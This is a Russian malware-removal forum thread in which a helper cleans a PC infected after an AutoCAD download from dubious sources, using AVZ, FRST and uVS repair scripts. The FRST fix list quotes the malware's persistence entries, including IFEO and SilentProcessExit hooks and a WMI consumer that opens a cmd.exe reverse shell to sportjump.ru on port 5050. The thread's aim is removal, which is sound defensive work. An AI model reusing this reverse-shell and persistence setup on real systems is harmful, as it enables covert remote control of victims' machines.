Показано с 1 по 14 из 14.

Regedit открывается и сразу закрывается, любая попытка запуска установки autocad ведет себя так же (заявка № 228606)

  1. #1
    Junior Member Репутация
    Регистрация
    16.06.2024
    Сообщений
    18
    Вес репутации
    1

    Thumbs up Regedit открывается и сразу закрывается, любая попытка запуска установки autocad ведет себя так же

    Здравствуйте! Пользователь пытался установить автокад с сомнительных источников и теперь Regedit открывается и сразу закрывается, любая попытка запуска установки autocad ведет себя так же.
    сканирование cureit чистое
    Вложение 689695

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,288
    Вес репутации
    379
    Уважаемый(ая) knunhbv303, спасибо за обращение на наш форум!

    Помощь в лечении компьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.

  4. #3
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,744
    Вес репутации
    1066
    Выполните скрипт в AVZ из папки Autologger\AV\av_z.exe:
    Код:
    {Исправление в службах в реестре, значения ImagePath.
    Данный скрипт распространяется свободно и может быть модицифирован по согласованию с авторами - представителями SafеZone.сс
    При публикации скрипта данный комментарий и ссылка на VirusNet.Info обязателена. }
    var DescriptionTextWuauServ, DispayNameTextWuauServ, DescriptionTextBITS: String;
     DispayNameTextBITS, FullPathSystem32, NameFolderSystem32, FileServiceDll: String;  
     ImagePathStr, RootStr, SubRootStr, LangID: string;
     AllRoots, AllKeys, RootsRestored, KeysRestored, KeysFixed: integer;
     FinishMsg, RestoreMsg, FixMsg, CheckMsg: String; 
     RegSectMsg, ParamMsg, ParamValueMsg, InRegSectMsg, CorrectMsg, RestMsg: String;
    
    procedure CheckAndRestoreSection(Root: String);
    begin
     Inc(AllRoots);
     if RegKeyExistsEx('HKLM', Root) then
       RegKeyResetSecurity('HKLM', Root)
     else
      begin
        Inc(RootsRestored);
        RegKeyCreate('HKLM', Root);
        AddToLog(RegSectMsg + Root + RestMsg);
       end;
    end;
    
    procedure CheckAndRestoreSubSection;
    begin
      CheckAndRestoreSection(SubRootStr);
    end;
    
    procedure RestoredMsg(Root, Param: String);
    begin
      AddToLog(ParamMsg + Param + InRegSectMsg + Root + RestMsg);
      Inc(KeysRestored);
    end;
    
    procedure FixedMsg(Root, Param: String);
    begin
      AddToLog(ParamValueMsg + Param + InRegSectMsg + Root + CorrectMsg);
      Inc(KeysFixed);
    end;
    
    procedure RestoreStrParam(Root, Param, Value: String);
    begin
      RegKeyStrParamWrite('HKLM', Root, Param, Value);
      RestoredMsg(Root, Param);
    end;
    
    procedure CheckAndRestoreStrParam(Root, Param, Value: String);
    begin
      Inc(AllKeys);
      if not RegKeyParamExists('HKLM', Root, Param) then
        RestoreStrParam(Root, Param, Value);
    end;
    
    procedure CheckAndRestoreIntParam(Root, Param: String; Value: Integer);
    begin
     Inc(AllKeys);
     if not RegKeyParamExists('HKLM', Root, Param) then 
      begin
        RegKeyIntParamWrite('HKLM', Root, Param, Value);
        RestoredMsg(Root, Param);
      end;
    end;
    
    procedure CheckAndRestoreMultiSZParam(Param, Value: String);
    begin
     Inc(AllKeys);
     if not RegKeyParamExists('HKLM', RootStr, Param) then
      begin
        ExecuteFile('REG ADD HKLM\' + RootStr + ' /v ' + Param + Value, '', 0, 10000, true);
        RestoredMsg(RootStr, Param);
      end;
    end;
    
    // Исправление значения параметра ImagePath для служб 'wuauserv' и 'BITS'
    procedure ImagePathFix(Node, Srv: String);
    var RegStr: String;
    begin
     RegStr := 'SYSTEM\' + Node + '\Services\' + Srv;
     if RegKeyExistsEx('HKLM', RegStr) then
      begin
        Inc(AllKeys);
        RegKeyResetSecurity('HKLM', RegStr);
        RegKeyStrParamWrite('HKLM', RegStr, 'ImagePath', ImagePathStr);
        FixedMsg(RegStr, 'ImagePath');
      end;
    end;
    
    { Выполнение исправление всех ключей в ветках -
       'HKLM\SYSTEM\CurrentControlSet\Services\BITS' и 'HKLM\SYSTEM\CurrentControlSet\Services\wuauserv'}
    procedure CorrectRegistryRoot(DescriptionText, DisplayNameText, Srv: String);
    var FileServiceDll, CCSNumber: string;
         i : integer;
    begin
     if Srv = 'BITS' then
       FileServiceDll := FullPathSystem32 + 'qmgr.dll'
     else
       FileServiceDll := FullPathSystem32 + 'wuauserv.dll';
     RootStr:= 'SYSTEM\CurrentControlSet\Services\' + Srv;
    
     CheckAndRestoreSection(RootStr);
    
     CheckAndRestoreStrParam(RootStr, 'Description', DescriptionText);
     CheckAndRestoreStrParam(RootStr, 'DisplayName', DisplayNameText);
     CheckAndRestoreStrParam(RootStr, 'ObjectName', 'LocalSystem');
    
     Inc(AllKeys);
     if not RegKeyParamExists('HKLM', RootStr, 'ImagePath') then
       RestoreStrParam(RootStr, 'ImagePath', ImagePathStr)
     else
      begin
        Dec(AllKeys);
        if LowerCase(RegKeyStrParamRead('HKLM', RootStr, 'ImagePath')) <> LowerCase(ImagePathStr) then
          for i:= 0 to 999 do
           begin
             if i > 0 then
               CCSNumber := FormatFloat('ControlSet000', i)
             else
               CCSNumber := 'CurrentControlSet';
             ImagePathFix(CCSNumber, Srv);
          end;
       end;
    
     CheckAndRestoreIntParam(RootStr, 'ErrorControl', 1);
     CheckAndRestoreIntParam(RootStr, 'Start', 2);
     CheckAndRestoreIntParam(RootStr, 'Type', 32);
    
     if Srv = 'BITS' then
      begin
        CheckAndRestoreMultiSZParam('DependOnService', ' /t REG_MULTI_SZ /d RpcSs');
        CheckAndRestoreMultiSZParam('DependOnGroup', ' /t REG_MULTI_SZ');
      end;
    
     SubRootStr:= RootStr + '\Enum';
     CheckAndRestoreSubSection;
    
     CheckAndRestoreStrParam(SubRootStr, '0', 'Root\LEGACY_' + UpperCase(Srv) + '\0000');
     CheckAndRestoreIntParam(SubRootStr, 'Count', 1);
     CheckAndRestoreIntParam(SubRootStr, 'NextInstance', 1);
    
     SubRootStr := RootStr + '\Security';
     CheckAndRestoreSubSection;
    
     Inc(AllKeys);
     if not RegKeyParamExists('HKLM', SubRootStr, 'Security') then
      begin
        RegKeyBinParamWrite('HKLM', SubRootStr, 'Security', '01,00,14,80,78,00,00,00,84,00,00,00,14,00,00,00,30,00,00,00,02,00,1c,00,01,00,00,00,02,80,14,00,ff,00,0f,00,01,01,00,00,00,00,00,01,00,00,00,00,02,00,48,00,03,00,00,00,00,00,14,00,9d,00,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,ff,01,0f,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00');
        RestoredMsg(SubRootStr, 'Security');
      end;
    
     SubRootStr:= RootStr + '\Parameters';
     CheckAndRestoreSubSection;
    
     Inc(AllKeys);
     if not RegKeyParamExists('HKLM', SubRootStr, 'ServiceDll') then
      begin
        RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll);
        RestoredMsg(SubRootStr, 'ServiceDll');
      end
     else if LowerCase(RegKeyStrParamRead('HKLM', SubRootStr, 'ServiceDll')) <> LowerCase(FileServiceDll) then
      begin
        RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll);
        FixedMsg(SubRootStr, 'ServiceDll');
      end
    end;
    
    { Главное выполнение }
    begin
    ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
     QuarantineFile('C:\Program Files\Autodesk\AdODIS\V1\Setup\AdskAccessServiceHost.exe', '');
     DeleteFile('C:\Program Files\Autodesk\AdODIS\V1\Setup\AdskAccessServiceHost.exe', '64');
     ClearLog;
     ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\wuauserv', 'wuauserv.reg');
     ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\BITS', 'BITS.reg');
     LangID:= RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Nls\Language', 'InstallLanguage'); 
     if LangID = '0419' then
      begin
        DescriptionTextWuauServ := 'Включает загрузку и установку обновлений Windows. Если служба отключена, то на этом компьютере нельзя будет использовать возможности автоматического обновления или веб-узел Центра обновления Windows.';
        DispayNameTextWuauServ := 'Автоматическое обновление';
        DescriptionTextBITS := 'Обеспечивает передачу данных между клиентами и серверами в фоновом режиме. Если служба BITS отключена, такие возможности, как Windows Update, не могут правильно работать.';
        DispayNameTextBITS := 'Фоновая интеллектуальная служба передачи (BITS)';
        AddToLog('Операционная система - русская');
        FinishMsg := '–––– Восстановление завершено ––––';
        RestoreMsg := 'Восстановлено разделов\параметров: ';
        FixMsg := 'Исправлено параметров: ';
        CheckMsg := 'Проверено разделов\параметров: ';
        RegSectMsg := 'Раздел реестра HKLM\';
        ParamMsg := 'Параметр ';
        ParamValueMsg := 'Значение параметра ';
        InRegSectMsg := ' в разделе реестра HKLM\';
        CorrectMsg := ' исправлено на оригинальное.';
        RestMsg := 'восстановлен.';
      end
     else
      begin
        DescriptionTextWuauServ := 'Enables the download and installation of Windows updates. If this service is disabled, this computer will not be able to use the Automatic Updates feature or the Windows Update Web site.';
        DispayNameTextWuauServ := 'Automatic Updates'; 
        DescriptionTextBITS := 'Transfers data between clients and servers in the background. If BITS is disabled, features such as Windows Update will not work correctly.';
        DispayNameTextBITS := 'Background Intelligent Transfer Service';
        AddToLog('Operation system - english');
        FinishMsg := '–––– Restoration finished ––––';
        RestoreMsg := 'Sections\parameters restored: ';
        FixMsg := 'Parameters corrected: ';
        CheckMsg := 'Sections\parameters checked: ';
        RegSectMsg := 'Registry section HKLM\';
        ParamMsg := 'Parameter ';
        ParamValueMsg := 'Value of parameter ';
        InRegSectMsg := ' in registry section HKLM\';
        CorrectMsg := ' corrected on original.';
        RestMsg := ' restored.';
      end;
     AddToLog('');
    
    { Определение папки X:\Windows\System32\ }
     NameFolderSystem32 := RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Windows', 'SystemDirectory');
     ImagePathStr := NameFolderSystem32 + '\svchost.exe -k netsvcs';
     Delete(NameFolderSystem32, 1, pos('\', NameFolderSystem32) - 1);
     FullPathSystem32 := GetEnvironmentVariable('WinDir') + NameFolderSystem32 + '\';
     
     AllRoots := 0;
     AllKeys := 0;
     RootsRestored := 0;
     KeysRestored := 0;
     KeysFixed := 0;
    
     CorrectRegistryRoot(DescriptionTextBITS, DispayNameTextBITS, 'BITS');
     CorrectRegistryRoot(DescriptionTextWuauServ, DispayNameTextWuauServ, 'wuauserv');
    
     AddToLog('');
     AddToLog(FinishMsg);
     AddToLog('');
     AddToLog(RestoreMsg + IntToStr(RootsRestored) + ' \ ' + IntToStr(KeysRestored));
     AddToLog(FixMsg + IntToStr(KeysFixed));
     AddToLog(CheckMsg + IntToStr(AllRoots) + ' \ ' + IntToStr(AllKeys));
     SaveLog(RegKeyStrParamRead('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders', 'Desktop') + '\Correct_wuauserv&BITS.log');
     DeleteFileMask('c:\program files\autodesk', '*', true);
     DeleteDirectory('c:\program files\autodesk');
     DeleteService('Autodesk Access Service Host');
     DeleteService('Autodesk');
     DeleteService('AdskNLM');
     ExecuteRepair(1);
     ExecuteWizard('SCU', 2, 2, true);
     CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
    RebootWindows(false);
    end.
    Компьютер перезагрузится.

    На рабочем столе появится файл Correct_wuauserv&BITS.log, приложте его к следующему сообщению.

    Скачайте Farbar Recovery Scan Tool или с зеркала и сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
    Запустите программу. Когда программа запустится, нажмите Да для соглашения с предупреждением.

    Нажмите кнопку Сканировать.

    После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
    Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
    WBR,
    Vadim

  5. #4
    Junior Member Репутация
    Регистрация
    16.06.2024
    Сообщений
    18
    Вес репутации
    1
    Вадим, благодарю за ответ, файлы во вложении

  6. #5
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,744
    Вес репутации
    1066
    Выделите и скопируйте в буфер обмена следующий код:
    Код:
    Start::
    ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
    HKU\S-1-5-21-2903352390-3467101877-3601869930-1001\...\Policies\Explorer: [] 
    HKU\S-1-5-21-2903352390-3467101877-3601869930-1001\...\MountPoints2: {6790c8e3-0ec6-11ef-839a-4c77cb2ebd63} - "D:\Setup.exe" 
    HKU\S-1-5-21-2903352390-3467101877-3601869930-1001\...\MountPoints2: {6790c93a-0ec6-11ef-839a-4c77cb2ebd63} - "E:\Setup.exe" 
    IFEO\svchost.exe: [GlobalFlag] C:\ProgramData\Classic.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\nun.bat
    HKLM\...\SilentProcessExit\svchost.exe: [MonitorProcess] C:\ProgramData\Classic.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\nun.bat
    IFEO\TrustedInstaller.exe: [GlobalFlag] C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat
    HKLM\...\SilentProcessExit\TrustedInstaller.exe: [MonitorProcess] C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat
    CMD: type C:\ProgramData\Classic.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\nun.bat
    C:\ProgramData\Classic.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\nun.bat
    Task: {4459215C-4DC5-4439-8D27-67231EA2EDA7} - System32\Tasks\Восстановление сервиса обновлений Яндекс.Браузера => C:\Program Files (x86)\Yandex\YandexBrowser\22.9.1.1095\service_update.exe  --repair (Нет файла)
    Task: C:\Windows\Tasks\Восстановление сервиса обновлений Яндекс.Браузера.job => C:\Program Files (x86)\Yandex\YandexBrowser\22.9.1.1095\service_update.exe
    S2 BITS_bkp; C:\Windows\System32\qmgr.dll [1481216 2023-11-24] (Microsoft Windows -> Microsoft Corporation)
    S3 dosvc; C:\Windows\System32\svchost.exe [55456 2023-11-24] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ВНИМАНИЕ (отсутствует ServiceDLL)
    S3 dosvc; C:\Windows\SysWOW64\svchost.exe [46544 2023-11-24] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ВНИМАНИЕ (отсутствует ServiceDLL)
    S2 dosvc_bkp; C:\Windows\system32\dosvc.dll [1537536 2024-02-29] (Microsoft Windows -> Microsoft Corporation)
    2024-06-16 02:56 - 2024-06-16 02:56 - 000000000 ____D C:\Users\dmitr\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Autodesk
    2024-06-16 02:27 - 2024-06-16 22:11 - 000000000 ____D C:\Users\dmitr\AppData\Roaming\Autodesk Installer
    2024-06-16 02:26 - 2024-06-16 02:37 - 000000000 ____D C:\Users\dmitr\AppData\Roaming\Autodesk
    2024-06-16 02:26 - 2024-06-16 02:27 - 000000000 ____D C:\ProgramData\Autodesk
    2024-06-16 02:26 - 2024-06-16 02:26 - 000000000 ____D C:\Users\dmitr\AppData\Local\Autodesk
    CustomCLSID: HKU\S-1-5-21-2903352390-3467101877-3601869930-1001_Classes\CLSID\{345D3165-3889-4694-AB75-A91A27B217E8}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2022\acad.exe => Нет файла
    CustomCLSID: HKU\S-1-5-21-2903352390-3467101877-3601869930-1001_Classes\CLSID\{8B4929F8-076F-4AEC-AFEE-8928747B7AE3}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2022\acad.exe /Automation => Нет файла
    CustomCLSID: HKU\S-1-5-21-2903352390-3467101877-3601869930-1001_Classes\CLSID\{AA46BA8A-9825-40FD-8493-0BA3C4D5CEB5}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2022\acad.exe /Automation => Нет файла
    CustomCLSID: HKU\S-1-5-21-2903352390-3467101877-3601869930-1001_Classes\CLSID\{ddc3f64f-9ca4-4f8e-a7f9-41585303716d}\InprocServer32 -> C:\Program Files\Mozilla Thunderbird\notificationserver.dll => Нет файла
    CustomCLSID: HKU\S-1-5-21-2903352390-3467101877-3601869930-1001_Classes\CLSID\{E2C40589-DE61-11ce-BAE0-0020AF6D7005}\InprocServer32 -> C:\Program Files\Autodesk\AutoCAD 2022\ru-RU\acadficn.dll => Нет файла
    ContextMenuHandlers1: [Kaspersky Free 21.15] -> {AE81D5A2-A34B-4D93-8DF8-540DBCE48043} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.15\x64\shellex.dll -> Нет файла
    ContextMenuHandlers1: [Kaspersky Free 21.16] -> {AE776072-9FCA-48AF-941C-5759266BB644} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.16\x64\shellex.dll -> Нет файла
    ContextMenuHandlers1: [Kaspersky Free 21.17] -> {0F574355-9FBE-40DB-ACB8-81F6612BB909} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.17\x64\shellex.dll -> Нет файла
    ContextMenuHandlers2: [Kaspersky Free 21.15] -> {AE81D5A2-A34B-4D93-8DF8-540DBCE48043} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.15\x64\shellex.dll -> Нет файла
    ContextMenuHandlers2: [Kaspersky Free 21.16] -> {AE776072-9FCA-48AF-941C-5759266BB644} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.16\x64\shellex.dll -> Нет файла
    ContextMenuHandlers2: [Kaspersky Free 21.17] -> {0F574355-9FBE-40DB-ACB8-81F6612BB909} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.17\x64\shellex.dll -> Нет файла
    ContextMenuHandlers4: [Kaspersky Free 21.15] -> {AE81D5A2-A34B-4D93-8DF8-540DBCE48043} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.15\x64\shellex.dll -> Нет файла
    ContextMenuHandlers4: [Kaspersky Free 21.16] -> {AE776072-9FCA-48AF-941C-5759266BB644} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.16\x64\shellex.dll -> Нет файла
    ContextMenuHandlers4: [Kaspersky Free 21.17] -> {0F574355-9FBE-40DB-ACB8-81F6612BB909} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.17\x64\shellex.dll -> Нет файла
    ContextMenuHandlers6: [Kaspersky Free 21.15] -> {AE81D5A2-A34B-4D93-8DF8-540DBCE48043} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.15\x64\shellex.dll -> Нет файла
    ContextMenuHandlers6: [Kaspersky Free 21.16] -> {AE776072-9FCA-48AF-941C-5759266BB644} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.16\x64\shellex.dll -> Нет файла
    ContextMenuHandlers6: [Kaspersky Free 21.17] -> {0F574355-9FBE-40DB-ACB8-81F6612BB909} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.17\x64\shellex.dll -> Нет файла
    WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"pers\"",Filter="__EventFilter.Name=\"pers\"::
    WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"nut\"",Filter="__EventFilter.Name=\"nut\"::
    WMI:subscription\__EventFilter->nut::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 180 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
    WMI:subscription\__EventFilter->pers::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 900 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
    WMI:subscription\CommandLineEventConsumer->nut::[CommandLineTemplate => C:\ProgramData\NUL..\StartMenuExperienceHost.exe --ssl sportjump.ru 5050 -e cmd.exe]
    WMI:subscription\CommandLineEventConsumer->pers::[CommandLineTemplate => C:\ProgramData\AUX..\ShellExt.dll C:\ProgramData\AUX..\utshellext.dll]
    C:\ProgramData\NUL..\StartMenuExperienceHost.exe 
    C:\ProgramData\AUX..\ShellExt.dll C:\ProgramData\AUX..\utshellext.dll
    C:\ProgramData\NUL..
    C:\ProgramData\AUX..
    HKU\S-1-5-21-2903352390-3467101877-3601869930-1001\Software\Classes\.scr: scrfile =>  <==== ВНИМАНИЕ
    StartBatch:
    del /s /q "%userprofile%\AppData\Local\temp\*.*"
    sfc /scannow
    endbatch:
    Reboot:
    End::
    Отключите до перезагрузки антивирус, запустите FRST.EXE/FRST64.EXE, нажмите один раз Исправить и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
    Компьютер будет перезагружен.

    Папку C:\FRST\Quarantine упакуйте с максимальным сжатием в непрерывный архив, выложите в облако или на файлообменник и дайте ссылку в личном сообщении.
    WBR,
    Vadim

  7. #6
    Junior Member Репутация
    Регистрация
    16.06.2024
    Сообщений
    18
    Вес репутации
    1
    fixlog во вложении, карантин отправил в личные сообщения
    p.s. еще добавился такой момент, что перестал открываться FRST64.exe (открывается и сразу закрывается), решил переименованием исполняемого файла, но до этого он открывался

  8. #7
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,744
    Вес репутации
    1066
    Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.
    WBR,
    Vadim

  9. #8
    Junior Member Репутация
    Регистрация
    16.06.2024
    Сообщений
    18
    Вес репутации
    1
    Лог UVS

  10. #9
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,744
    Вес репутации
    1066
    Скопируйте скрипт ниже в буфер обмена (выделить и нажать Ctrl-C):
    Код:
    ;uVS v4.15.7v [http://dsrt.dyndns.org:8888]
    ;Target OS: NTv10.0
    v400c
    sfc %Sys32%\WUAUSERV.DLL
    zoo %Sys32%\WUAUSERV.DLL
    delref %SystemDrive%\PROGRAM FILES (X86)\KASPERSKY LAB\KASPERSKY SECURITY CLOUD 21.3\FFEXT\LIGHT_PLUGIN_FIREFOX\ADDON.XPI
    delref %SystemDrive%\PROGRAM FILES (X86)\KASPERSKY LAB\KASPERSKY 21.17\X64\SHELLEX.DLL
    delref %SystemDrive%\PROGRAM FILES (X86)\KASPERSKY LAB\KASPERSKY 21.17\SHELLEX.DLL
    delref %SystemDrive%\PROGRAM FILES (X86)\KASPERSKY LAB\KASPERSKY 21.16\X64\SHELLEX.DLL
    delref %SystemDrive%\PROGRAM FILES (X86)\KASPERSKY LAB\KASPERSKY 21.16\SHELLEX.DLL
    delref %SystemDrive%\PROGRAM FILES (X86)\KASPERSKY LAB\KASPERSKY 21.15\X64\SHELLEX.DLL
    delref %SystemDrive%\PROGRAM FILES (X86)\KASPERSKY LAB\KASPERSKY 21.15\SHELLEX.DLL
    delref %SystemDrive%\PROGRAM FILES (X86)\YANDEX\YANDEXBROWSER\APPLICATION\22.5.0.1793\INSTALLER\YNDXSTP.EXE
    delref %SystemDrive%\USERS\DMITR\APPDATA\LOCAL\PROGRAMS\WHATSAPP\WHATSAPPLAUNCHER.EXE
    apply
    deltmp
    Запустите файл start.exe из папки с uVS, выберите "Запустить под текущим пользователем", в главном меню программы - Скрипты -> выполнить скрипт из буфера обмена.

    В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.

    Скачайте вложенный архив и извлеките из него пять файлов.
    Службы.zip
    Запустите по очереди каждый. При запросе соглашайтесь на внесение изменений в реестр.
    Если будут выдаваться ошибки, проделайте это в безопасном режиме.

    Перезагрузите систему.

    Скачайте Farbar Service Scanner

    Запустите.
    Убедитесь, что отмечены следующие пункты:
    Internet Services
    Windows Firewall
    System Restore
    Security Center/Action Center
    Windows Update
    Windows Defender

    Нажмите кнопку "Scan"

    Будет создан отчёт (FSS.txt) в той же папке, откуда запущена утилита.
    Прикрепите этот файл к своему сообщению.
    WBR,
    Vadim

  11. #10
    Junior Member Репутация
    Регистрация
    16.06.2024
    Сообщений
    18
    Вес репутации
    1
    готово

  12. #11
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,744
    Вес репутации
    1066
    Какие остались проблемы?
    WBR,
    Vadim

  13. #12
    Junior Member Репутация
    Регистрация
    16.06.2024
    Сообщений
    18
    Вес репутации
    1
    пока не проверял, чтобы не нарушить процесс лечения, сейчас протестирую и отпишусь, спасибо

    - - - - -Добавлено - - - - -

    Вадим, спасибо! Невероятно, все работает! служба обновлений завелась, обновления ставятся, автокад ставится, редактор реестра открывается. Можно вкратце сценарий этого лечения? Как поняли, что надо копать в сторону восстановления службы обновления?

  14. #13
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,744
    Вес репутации
    1066
    Проблемы со службами были видны уже по логу AVZ:
    Нестандартный ключ реестра для системной службы: BITS ImagePath="C:\Windows\System32\svchost.exe -k netsvcs -p"
    Нестандартный ключ реестра для системной службы: wuauserv ImagePath="C:\Windows\system32\svchost.exe -k netsvcs -p"
    В ходе исследования заданий BITS возникла ошибка. Возможно, служба BITS отключена. Данные по ошибке: Ошибка при выполнении приложения-сервера, ClassID: {4991D34B-80A1-4291-83B6-3328366B9097}
    Их частично пофиксили уже первым скриптом.
    В системе были следы майнера, который портит системные службы, так что, случай уже типовой.
    WBR,
    Vadim

  15. Это понравилось:


  16. #14
    Junior Member Репутация
    Регистрация
    16.06.2024
    Сообщений
    18
    Вес репутации
    1
    понял, спасибо большое еще раз!

  • Уважаемый(ая) knunhbv303, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Windows на MAC ведет себя не так
      От riznenet14 в разделе Помогите!
      Ответов: 5
      Последнее сообщение: 24.03.2016, 19:25
    2. Ответов: 5
      Последнее сообщение: 26.10.2015, 17:02
    3. Ответов: 5
      Последнее сообщение: 21.05.2015, 20:57
    4. Ответов: 2
      Последнее сообщение: 16.06.2014, 19:59
    5. Система ведет себя как-то не так...
      От Alexandr II в разделе Помогите!
      Ответов: 4
      Последнее сообщение: 15.05.2011, 01:17

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00604 seconds with 18 queries